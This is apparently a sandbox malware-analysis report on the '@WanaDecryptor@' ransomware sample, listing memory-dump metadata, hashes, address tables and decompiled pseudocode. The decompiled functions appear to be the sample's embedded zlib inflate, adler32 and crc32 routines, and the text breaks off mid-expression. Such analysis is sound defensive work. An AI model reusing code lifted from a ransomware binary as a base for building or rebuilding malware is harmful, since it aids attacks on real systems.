                                                      0x004105ca
                                                      0x004105ca
                                                      0x004105cf
                                                      0x00000000
                                                      0x004105d5
                                                      0x004105d5
                                                      0x004105d8
                                                      0x004105e3
                                                      0x004105e8
                                                      0x004105f3
                                                      0x00410600
                                                      0x00000000
                                                      0x004105f5
                                                      0x004105f5
                                                      0x00000000
                                                      0x004105f5
                                                      0x004105f3
                                                      0x004105ae
                                                      0x004105b1
                                                      0x004105b7
                                                      0x004105ba
                                                      0x00000000
                                                      0x004105ba
                                                      0x00000000
                                                      0x00000000
                                                      0x00410606
                                                      0x00410606
                                                      0x0041060b
                                                      0x00000000
                                                      0x00410611
                                                      0x00410615
                                                      0x0041061b
                                                      0x0041061e
                                                      0x00410621
                                                      0x00410623
                                                      0x0041062a
                                                      0x0041062f
                                                      0x00410630
                                                      0x00410632
                                                      0x00410635
                                                      0x00000000
                                                      0x00410635
                                                      0x00000000
                                                      0x00000000
                                                      0x0041063b
                                                      0x0041063b
                                                      0x00410640
                                                      0x00000000
                                                      0x00410646
                                                      0x0041064b
                                                      0x0041064d
                                                      0x00410650
                                                      0x00410653
                                                      0x0041065a
                                                      0x00410664
                                                      0x00410669
                                                      0x0041066a
                                                      0x0041066c
                                                      0x0041066f
                                                      0x00000000
                                                      0x0041066f
                                                      0x00000000
                                                      0x00000000
                                                      0x00410675
                                                      0x00410675
                                                      0x0041067a
                                                      0x00000000
                                                      0x00410680
                                                      0x00410685
                                                      0x00410687
                                                      0x0041068a
                                                      0x0041068d
                                                      0x00410694
                                                      0x0041069e
                                                      0x004106a3
                                                      0x004106a4
                                                      0x004106a6
                                                      0x004106a9
                                                      0x00000000
                                                      0x004106a9
                                                      0x00000000
                                                      0x00000000
                                                      0x004106af
                                                      0x004106af
                                                      0x004106b4
                                                      0x0041072e
                                                      0x00410734
                                                      0x004106b6
                                                      0x004106bd
                                                      0x004106c0
                                                      0x004106c3
                                                      0x004106cf
                                                      0x004106d1
                                                      0x004106d6
                                                      0x004106d7
                                                      0x004106d9
                                                      0x004106e4
                                                      0x00410844
                                                      0x00000000
                                                      0x004106ea
                                                      0x004106ea
                                                      0x004106f0
                                                      0x004106f7
                                                      0x004106fa
                                                      0x00000000
                                                      0x004106fa
                                                      0x004106e4
                                                      0x00000000
                                                      0x00000000
                                                      0x0041084d
                                                      0x0041084d
                                                      0x00410853
                                                      0x00000000
                                                      0x00000000
                                                      0x00410857
                                                      0x0041085d
                                                      0x00000000
                                                      0x00000000
                                                      0x004106fd
                                                      0x004106fd
                                                      0x00410700
                                                      0x00410702
                                                      0x004104ad
                                                      0x004104a2
                                                      0x00000000
                                                      0x00410475
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5ba8141ea2280d0230f62837d297c6f142902cf6410748b00ceee70376d87497
                                                      • Instruction ID: d75a74fb3a0dfdb81fbbcc262e1caa4e3a0368247a27923ffbf4d457c3a86cdc
                                                      • Opcode Fuzzy Hash: 5ba8141ea2280d0230f62837d297c6f142902cf6410748b00ceee70376d87497
                                                      • Instruction Fuzzy Hash: E4E105B5600A018FD334CF19D490A62FBF2EF89310B25C96ED4AACB761D775E886CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040FBC0 Relevance: .4, Instructions: 359COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E0040FBC0() {
				signed int _t153;
				unsigned int _t155;
				unsigned int _t161;
				signed char _t173;
				signed int _t176;
				intOrPtr _t177;
				signed int _t178;
				signed char _t180;
				signed int _t181;
				intOrPtr _t182;
				intOrPtr _t193;
				signed int _t200;
				intOrPtr _t201;
				signed int _t204;
				signed int _t212;
				signed int _t219;
				signed int _t235;
				signed int _t240;
				void* _t241;
				void* _t242;
				void* _t243;
				intOrPtr* _t249;
				signed int _t252;
				signed int _t261;
				signed int _t267;
				unsigned int _t270;
				unsigned int _t273;
				char* _t279;
				char* _t280;
				char* _t281;
				char* _t282;
				char* _t283;
				intOrPtr _t284;
				intOrPtr _t285;
				void* _t286;
				intOrPtr* _t287;
				signed int _t289;
				intOrPtr _t290;
				void* _t291;
				intOrPtr* _t295;
				intOrPtr* _t297;
				intOrPtr* _t299;
				intOrPtr* _t301;
				signed int _t305;
				signed int _t309;
				intOrPtr* _t313;
				intOrPtr _t317;
				void* _t320;
				intOrPtr _t321;
				signed int _t323;
				intOrPtr _t325;
				intOrPtr _t326;
				signed int _t327;
				void* _t328;
				void* _t330;
				void* _t331;

				_t153 =  *(_t331 + 0x2c);
				_t204 =  *(_t331 + 0x28);
				_t316 =  *_t153;
				_t270 =  *(_t204 + 0x20);
				_t284 =  *((intOrPtr*)(_t204 + 0x30));
				_t279 =  *((intOrPtr*)(_t204 + 0x34));
				 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t153 + 4));
				_t155 =  *(_t204 + 0x1c);
				 *((intOrPtr*)(_t331 + 0x18)) = _t316;
				if(_t279 >= _t284) {
					 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t204 + 0x2c)) - _t279;
				} else {
					 *((intOrPtr*)(_t331 + 0x14)) = _t284 - _t279 - 1;
				}
				 *(_t331 + 0x1c) =  *(0x41a260 +  *(_t331 + 0x28) * 4);
				 *(_t331 + 0x20) =  *(0x41a260 +  *(_t331 + 0x2c) * 4);
				L4:
				while(1) {
					if(_t155 < 0x14) {
						do {
							 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
							_t289 = 0 << _t155;
							_t155 = _t155 + 8;
							_t270 = _t270 | _t289;
							_t316 = _t316 + 1;
						} while (_t155 < 0x14);
						 *((intOrPtr*)(_t331 + 0x18)) = _t316;
					}
					_t285 =  *((intOrPtr*)(_t331 + 0x30));
					_t212 =  *(_t331 + 0x1c) & _t270;
					_t173 =  *((intOrPtr*)(_t285 + _t212 * 8));
					_t286 = _t285 + _t212 * 8;
					if(0 == 0) {
						L35:
						_t270 = _t270 >>  *(_t286 + 1);
						_t155 = _t155;
						 *_t279 =  *((intOrPtr*)(_t286 + 4));
						_t279 = _t279 + 1;
						 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t331 + 0x14)) - 1;
						goto L36;
					} else {
						_t270 = _t270 >>  *(_t286 + 1);
						_t155 = _t155;
						 *(_t331 + 0x28) = 0;
						if((_t173 & 0x00000010) != 0) {
							L12:
							_t178 = _t173 & 0x0000000f;
							_t161 = _t155 - _t178;
							 *(_t331 + 0x2c) = ( *(0x41a260 + _t178 * 4) & _t270) +  *((intOrPtr*)(_t286 + 4));
							_t273 = _t270 >> _t178;
							if(_t161 < 0xf) {
								do {
									 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
									_t309 = 0 << _t161;
									_t161 = _t161 + 8;
									_t273 = _t273 | _t309;
									_t316 = _t316 + 1;
								} while (_t161 < 0xf);
								 *((intOrPtr*)(_t331 + 0x18)) = _t316;
							}
							_t290 =  *((intOrPtr*)(_t331 + 0x34));
							_t235 =  *(_t331 + 0x20) & _t273;
							_t180 =  *((intOrPtr*)(_t290 + _t235 * 8));
							_t291 = _t290 + _t235 * 8;
							_t270 = _t273 >>  *(_t291 + 1);
							_t155 = _t161;
							 *(_t331 + 0x28) = 0;
							if((_t180 & 0x00000010) != 0) {
								L18:
								_t181 = _t180 & 0x0000000f;
								while(_t155 < _t181) {
									 *((intOrPtr*)(_t331 + 0x10)) =  *((intOrPtr*)(_t331 + 0x10)) - 1;
									_t323 = 0 << _t155;
									_t155 = _t155 + 8;
									_t270 = _t270 | _t323;
									_t316 =  *((intOrPtr*)(_t331 + 0x18)) + 1;
									 *((intOrPtr*)(_t331 + 0x18)) =  *((intOrPtr*)(_t331 + 0x18)) + 1;
								}
								_t320 = ( *(0x41a260 + _t181 * 4) & _t270) +  *((intOrPtr*)(_t291 + 4));
								_t270 = _t270 >> _t181;
								_t240 =  *(_t331 + 0x2c);
								_t155 = _t155 - _t181;
								 *((intOrPtr*)(_t331 + 0x14)) =  *((intOrPtr*)(_t331 + 0x14)) - _t240;
								_t295 = _t279 - _t320;
								_t321 =  *((intOrPtr*)(_t331 + 0x38));
								_t182 =  *((intOrPtr*)(_t321 + 0x28));
								if(_t295 >= _t182) {
									 *_t279 =  *_t295;
									_t280 = _t279 + 1;
									 *_t280 =  *((intOrPtr*)(_t295 + 1));
									_t281 = _t280 + 1;
									_t297 = _t295 + 2;
									_t241 = _t240 - 2;
									do {
										 *_t281 =  *_t297;
										_t281 = _t281 + 1;
										_t297 = _t297 + 1;
										_t241 = _t241 - 1;
									} while (_t241 != 0);
									_t316 =  *((intOrPtr*)(_t331 + 0x18));
								} else {
									_t327 =  *(_t321 + 0x2c);
									 *(_t331 + 0x28) = _t327;
									_t328 = _t327 - _t182;
									do {
										_t295 = _t295 + _t328;
									} while (_t295 < _t182);
									_t330 =  *(_t331 + 0x28) - _t295;
									if(_t240 <= _t330) {
										 *_t279 =  *_t295;
										_t282 = _t279 + 1;
										 *_t282 =  *((intOrPtr*)(_t295 + 1));
										_t283 = _t282 + 1;
										_t299 = _t295 + 2;
										_t242 = _t240 - 2;
										do {
											 *_t283 =  *_t299;
											_t283 = _t283 + 1;
											_t299 = _t299 + 1;
											_t242 = _t242 - 1;
										} while (_t242 != 0);
										_t316 =  *((intOrPtr*)(_t331 + 0x18));
									} else {
										_t243 = _t240 - _t330;
										do {
											 *_t279 =  *_t295;
											_t279 = _t279 + 1;
											_t295 = _t295 + 1;
											_t330 = _t330 - 1;
										} while (_t330 != 0);
										_t301 =  *((intOrPtr*)( *((intOrPtr*)(_t331 + 0x38)) + 0x28));
										do {
											 *_t279 =  *_t301;
											_t279 = _t279 + 1;
											_t301 = _t301 + 1;
											_t243 = _t243 - 1;
										} while (_t243 != 0);
										_t316 =  *((intOrPtr*)(_t331 + 0x18));
									}
								}
								L36:
								if( *((intOrPtr*)(_t331 + 0x14)) < 0x102 ||  *((intOrPtr*)(_t331 + 0x10)) < 0xa) {
									_t287 =  *((intOrPtr*)(_t331 + 0x3c));
									_t219 =  *((intOrPtr*)(_t287 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
									_t176 = _t155 >> 3;
									if(_t176 < _t219) {
										_t219 = _t176;
									}
									_t177 =  *((intOrPtr*)(_t331 + 0x38));
									_t317 = _t316 - _t219;
									 *(_t177 + 0x20) = _t270;
									 *((intOrPtr*)(_t177 + 0x1c)) = _t155 - _t219 * 8;
									 *((intOrPtr*)(_t287 + 4)) = _t219 +  *((intOrPtr*)(_t331 + 0x10));
									 *_t287 = _t317;
									 *((intOrPtr*)(_t287 + 8)) =  *((intOrPtr*)(_t287 + 8)) + _t317 -  *_t287;
									 *((intOrPtr*)(_t177 + 0x34)) = _t279;
									return 0;
								} else {
									continue;
								}
							} else {
								while((_t180 & 0x00000040) == 0) {
									_t252 = ( *(0x41a260 + _t180 * 4) & _t270) +  *((intOrPtr*)(_t291 + 4));
									_t180 =  *((intOrPtr*)(_t291 + _t252 * 8));
									_t291 = _t291 + _t252 * 8;
									_t270 = _t270 >>  *(_t291 + 1);
									_t155 = _t155;
									 *(_t331 + 0x28) = 0;
									if((_t180 & 0x00000010) == 0) {
										continue;
									} else {
										goto L18;
									}
									goto L51;
								}
								_t249 =  *((intOrPtr*)(_t331 + 0x3c));
								 *(_t249 + 0x18) = "invalid distance code";
								 *(_t331 + 0x2c) =  *((intOrPtr*)(_t249 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
								_t305 = _t155 >> 3;
								if(_t305 >=  *(_t331 + 0x2c)) {
									goto L49;
								}
								goto L50;
							}
						} else {
							while((_t173 & 0x00000040) == 0) {
								_t267 = ( *(0x41a260 + _t173 * 4) & _t270) +  *((intOrPtr*)(_t286 + 4));
								_t173 =  *((intOrPtr*)(_t286 + _t267 * 8));
								_t286 = _t286 + _t267 * 8;
								if(0 == 0) {
									goto L35;
								} else {
									_t270 = _t270 >>  *(_t286 + 1);
									_t155 = _t155;
									 *(_t331 + 0x28) = 0;
									if((_t173 & 0x00000010) == 0) {
										continue;
									} else {
										goto L12;
									}
								}
								goto L51;
							}
							if((_t173 & 0x00000020) == 0) {
								_t249 =  *((intOrPtr*)(_t331 + 0x3c));
								 *(_t249 + 0x18) = "invalid literal/length code";
								 *(_t331 + 0x2c) =  *((intOrPtr*)(_t249 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
								_t305 = _t155 >> 3;
								if(_t305 >=  *(_t331 + 0x2c)) {
									L49:
									_t305 =  *(_t331 + 0x2c);
								}
								L50:
								_t193 =  *((intOrPtr*)(_t331 + 0x38));
								_t325 = _t316 - _t305;
								 *(_t193 + 0x20) = _t270;
								 *((intOrPtr*)(_t193 + 0x1c)) = _t155 - _t305 * 8;
								 *((intOrPtr*)(_t249 + 4)) = _t305 +  *((intOrPtr*)(_t331 + 0x10));
								 *_t249 = _t325;
								 *((intOrPtr*)(_t249 + 8)) =  *((intOrPtr*)(_t249 + 8)) + _t325 -  *_t249;
								 *((intOrPtr*)(_t193 + 0x34)) = _t281;
								return 0xfffffffd;
							} else {
								_t313 =  *((intOrPtr*)(_t331 + 0x3c));
								_t261 =  *((intOrPtr*)(_t313 + 4)) -  *((intOrPtr*)(_t331 + 0x10));
								_t200 = _t155 >> 3;
								if(_t200 < _t261) {
									_t261 = _t200;
								}
								_t201 =  *((intOrPtr*)(_t331 + 0x38));
								_t326 = _t316 - _t261;
								 *(_t201 + 0x20) = _t270;
								 *((intOrPtr*)(_t201 + 0x1c)) = _t155 - _t261 * 8;
								 *((intOrPtr*)(_t313 + 4)) = _t261 +  *((intOrPtr*)(_t331 + 0x10));
								 *_t313 = _t326;
								 *((intOrPtr*)(_t313 + 8)) =  *((intOrPtr*)(_t313 + 8)) + _t326 -  *_t313;
								 *((intOrPtr*)(_t201 + 0x34)) = _t281;
								return 1;
							}
						}
					}
					L51:
				}
			}



























































                                                      0x0040fbc3
                                                      0x0040fbc7
                                                      0x0040fbcd
                                                      0x0040fbd2
                                                      0x0040fbd6
                                                      0x0040fbda
                                                      0x0040fbdd
                                                      0x0040fbe1
                                                      0x0040fbe6
                                                      0x0040fbea
                                                      0x0040fbfa
                                                      0x0040fbec
                                                      0x0040fbef
                                                      0x0040fbef
                                                      0x0040fc09
                                                      0x0040fc18
                                                      0x00000000
                                                      0x0040fc1c
                                                      0x0040fc1f
                                                      0x0040fc21
                                                      0x0040fc26
                                                      0x0040fc33
                                                      0x0040fc35
                                                      0x0040fc38
                                                      0x0040fc3a
                                                      0x0040fc3b
                                                      0x0040fc40
                                                      0x0040fc40
                                                      0x0040fc48
                                                      0x0040fc4c
                                                      0x0040fc50
                                                      0x0040fc53
                                                      0x0040fc58
                                                      0x0040fe15
                                                      0x0040fe1a
                                                      0x0040fe1c
                                                      0x0040fe21
                                                      0x0040fe27
                                                      0x0040fe29
                                                      0x00000000
                                                      0x0040fc5e
                                                      0x0040fc63
                                                      0x0040fc65
                                                      0x0040fc67
                                                      0x0040fc6e
                                                      0x0040fca9
                                                      0x0040fca9
                                                      0x0040fcac
                                                      0x0040fcba
                                                      0x0040fcc0
                                                      0x0040fcc5
                                                      0x0040fcc7
                                                      0x0040fccc
                                                      0x0040fcd9
                                                      0x0040fcdb
                                                      0x0040fcde
                                                      0x0040fce0
                                                      0x0040fce1
                                                      0x0040fce6
                                                      0x0040fce6
                                                      0x0040fcee
                                                      0x0040fcf2
                                                      0x0040fcf6
                                                      0x0040fcf9
                                                      0x0040fd01
                                                      0x0040fd03
                                                      0x0040fd05
                                                      0x0040fd0c
                                                      0x0040fd3f
                                                      0x0040fd3f
                                                      0x0040fd44
                                                      0x0040fd4b
                                                      0x0040fd58
                                                      0x0040fd5a
                                                      0x0040fd5d
                                                      0x0040fd63
                                                      0x0040fd66
                                                      0x0040fd66
                                                      0x0040fd7c
                                                      0x0040fd80
                                                      0x0040fd82
                                                      0x0040fd86
                                                      0x0040fd8a
                                                      0x0040fd90
                                                      0x0040fd92
                                                      0x0040fd96
                                                      0x0040fd9b
                                                      0x0040fdf8
                                                      0x0040fdfd
                                                      0x0040fdff
                                                      0x0040fe01
                                                      0x0040fe02
                                                      0x0040fe03
                                                      0x0040fe06
                                                      0x0040fe08
                                                      0x0040fe0a
                                                      0x0040fe0b
                                                      0x0040fe0c
                                                      0x0040fe0c
                                                      0x0040fe0f
                                                      0x0040fd9d
                                                      0x0040fd9d
                                                      0x0040fda0
                                                      0x0040fda4
                                                      0x0040fda6
                                                      0x0040fda6
                                                      0x0040fda8
                                                      0x0040fdb0
                                                      0x0040fdb4
                                                      0x0040fdd9
                                                      0x0040fdde
                                                      0x0040fde0
                                                      0x0040fde2
                                                      0x0040fde3
                                                      0x0040fde4
                                                      0x0040fde7
                                                      0x0040fde9
                                                      0x0040fdeb
                                                      0x0040fdec
                                                      0x0040fded
                                                      0x0040fded
                                                      0x0040fdf0
                                                      0x0040fdb6
                                                      0x0040fdb6
                                                      0x0040fdb8
                                                      0x0040fdba
                                                      0x0040fdbc
                                                      0x0040fdbd
                                                      0x0040fdbe
                                                      0x0040fdbe
                                                      0x0040fdc5
                                                      0x0040fdc8
                                                      0x0040fdca
                                                      0x0040fdcc
                                                      0x0040fdcd
                                                      0x0040fdce
                                                      0x0040fdce
                                                      0x0040fdd1
                                                      0x0040fdd1
                                                      0x0040fdb4
                                                      0x0040fe2d
                                                      0x0040fe35
                                                      0x0040fe71
                                                      0x0040fe7c
                                                      0x0040fe80
                                                      0x0040fe85
                                                      0x0040fe87
                                                      0x0040fe87
                                                      0x0040fe89
                                                      0x0040fe8d
                                                      0x0040fe8f
                                                      0x0040fe9b
                                                      0x0040fea9
                                                      0x0040feae
                                                      0x0040feb4
                                                      0x0040feb7
                                                      0x0040fec3
                                                      0x0040fe3e
                                                      0x00000000
                                                      0x0040fe3e
                                                      0x0040fd0e
                                                      0x0040fd0e
                                                      0x0040fd23
                                                      0x0040fd27
                                                      0x0040fd2a
                                                      0x0040fd32
                                                      0x0040fd34
                                                      0x0040fd36
                                                      0x0040fd3d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040fd3d
                                                      0x0040fe43
                                                      0x0040fe4e
                                                      0x0040fe57
                                                      0x0040fe61
                                                      0x0040fe66
                                                      0x00000000
                                                      0x0040fe6c
                                                      0x00000000
                                                      0x0040fe66
                                                      0x0040fc70
                                                      0x0040fc70
                                                      0x0040fc85
                                                      0x0040fc89
                                                      0x0040fc8c
                                                      0x0040fc91
                                                      0x00000000
                                                      0x0040fc97
                                                      0x0040fc9c
                                                      0x0040fc9e
                                                      0x0040fca0
                                                      0x0040fca7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040fca7
                                                      0x00000000
                                                      0x0040fc91
                                                      0x0040fec7
                                                      0x0040ff1f
                                                      0x0040ff2a
                                                      0x0040ff33
                                                      0x0040ff3d
                                                      0x0040ff42
                                                      0x0040ff44
                                                      0x0040ff44
                                                      0x0040ff44
                                                      0x0040ff48
                                                      0x0040ff48
                                                      0x0040ff4c
                                                      0x0040ff4e
                                                      0x0040ff5c
                                                      0x0040ff68
                                                      0x0040ff6f
                                                      0x0040ff73
                                                      0x0040ff76
                                                      0x0040ff85
                                                      0x0040fec9
                                                      0x0040fec9
                                                      0x0040fed4
                                                      0x0040fed8
                                                      0x0040fedd
                                                      0x0040fedf
                                                      0x0040fedf
                                                      0x0040fee1
                                                      0x0040fee5
                                                      0x0040fee7
                                                      0x0040fef3
                                                      0x0040ff01
                                                      0x0040ff06
                                                      0x0040ff0c
                                                      0x0040ff0f
                                                      0x0040ff1e
                                                      0x0040ff1e
                                                      0x0040fec7
                                                      0x0040fc6e
                                                      0x00000000
                                                      0x0040fc58

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6486e9592c2cb46b2c7999eca97cef0babd6418c513dfe1291d56d14bfb9792
                                                      • Instruction ID: 2ca3a7e0973b0a9ded1865a7ec8cc067e044c270efaf411a13bb96b1b7e56096
                                                      • Opcode Fuzzy Hash: d6486e9592c2cb46b2c7999eca97cef0babd6418c513dfe1291d56d14bfb9792
                                                      • Instruction Fuzzy Hash: DDD1B73560C3418FC718CF2CD59016ABBE1EB99310F19497EE9DAA3756C734E819CB89
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00410180 Relevance: .1, Instructions: 127COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00410180() {
				unsigned int _t28;
				unsigned int _t35;
				signed int _t38;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				unsigned int _t96;
				signed int _t97;
				unsigned int _t114;
				signed int _t117;
				void* _t119;

				_t114 =  *(_t119 + 0xc);
				_t96 =  *(_t119 + 0xc);
				_t38 = _t96 & 0x0000ffff;
				_t97 = _t96 >> 0x10;
				if(_t114 != 0) {
					_t35 =  *(_t119 + 0x18);
					if(_t35 > 0) {
						do {
							_t28 = _t35;
							if(_t35 >= 0x15b0) {
								_t28 = 0x15b0;
							}
							_t35 = _t35 - _t28;
							if(_t28 >= 0x10) {
								_t117 = _t28 >> 4;
								_t28 = _t28 + ( ~_t117 << 4);
								do {
									_t114 = _t114 + 0x10;
									_t40 = _t38;
									_t41 = _t40;
									_t42 = _t41;
									_t43 = _t42;
									_t44 = _t43;
									_t45 = _t44;
									_t46 = _t45;
									_t47 = _t46;
									_t48 = _t47;
									_t49 = _t48;
									_t50 = _t49;
									_t51 = _t50;
									_t52 = _t51;
									_t53 = _t52;
									_t54 = _t53;
									_t38 = _t54;
									_t97 = _t97 + _t40 + _t41 + _t42 + _t43 + _t44 + _t45 + _t46 + _t47 + _t48 + _t49 + _t50 + _t51 + _t52 + _t53 + _t54 + _t38;
									_t117 = _t117 - 1;
								} while (_t117 != 0);
							}
							if(_t28 != 0) {
								do {
									_t38 = _t38;
									_t114 = _t114 + 1;
									_t97 = _t97 + _t38;
									_t28 = _t28 - 1;
								} while (_t28 != 0);
							}
							_t38 = _t38 % 0xfff1;
							_t97 = _t97 % 0xfff1;
						} while (_t35 > 0);
					}
					return _t97 << 0x00000010 | _t38;
				} else {
					return 1;
				}
			}


























                                                      0x00410181
                                                      0x00410186
                                                      0x0041018c
                                                      0x00410192
                                                      0x00410197
                                                      0x004101a2
                                                      0x004101a8
                                                      0x004101af
                                                      0x004101b5
                                                      0x004101b7
                                                      0x004101b9
                                                      0x004101b9
                                                      0x004101be
                                                      0x004101c3
                                                      0x004101cb
                                                      0x004101d5
                                                      0x004101d7
                                                      0x004101db
                                                      0x004101de
                                                      0x004101e7
                                                      0x004101f0
                                                      0x004101f9
                                                      0x00410202
                                                      0x0041020b
                                                      0x00410214
                                                      0x0041021d
                                                      0x00410226
                                                      0x0041022f
                                                      0x00410238
                                                      0x00410241
                                                      0x0041024a
                                                      0x00410253
                                                      0x0041025c
                                                      0x00410265
                                                      0x00410267
                                                      0x00410269
                                                      0x00410269
                                                      0x004101d7
                                                      0x00410272
                                                      0x00410274
                                                      0x00410278
                                                      0x0041027a
                                                      0x0041027b
                                                      0x0041027d
                                                      0x0041027d
                                                      0x00410274
                                                      0x00410292
                                                      0x0041029a
                                                      0x0041029a
                                                      0x004102a2
                                                      0x004102ad
                                                      0x0041019a
                                                      0x004101a0
                                                      0x004101a0

                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
                                                      • Instruction ID: 6bb151cab00cdc0290d3db98aa961ff277c67549bb944e7b7c7e1e2eea59e94c
                                                      • Opcode Fuzzy Hash: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
                                                      • Instruction Fuzzy Hash: A1314D3374558203F71DCA2F8CA12FAEAD34FD522872DD57E99C987356ECFA48564104
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040FF90 Relevance: .1, Instructions: 109COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040FF90(signed int _a4, intOrPtr _a8, unsigned int _a12) {
				signed int _t29;
				intOrPtr _t76;
				unsigned int _t115;
				unsigned int _t118;

				_t76 = _a8;
				if(_t76 != 0) {
					_t118 = _a12;
					_t29 =  !_a4;
					if(_t118 >= 8) {
						_t115 = _t118 >> 3;
						do {
							_t118 = _t118 - 8;
							_t29 = ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + (( *(0x41b60c + (( *(0x41b60c + (_t29 & 0x000000ff ^ 0) * 4) ^ _t29 >> 0x00000008) & 0x000000ff ^ 0) * 4) ^ ( *(0x41b60c + 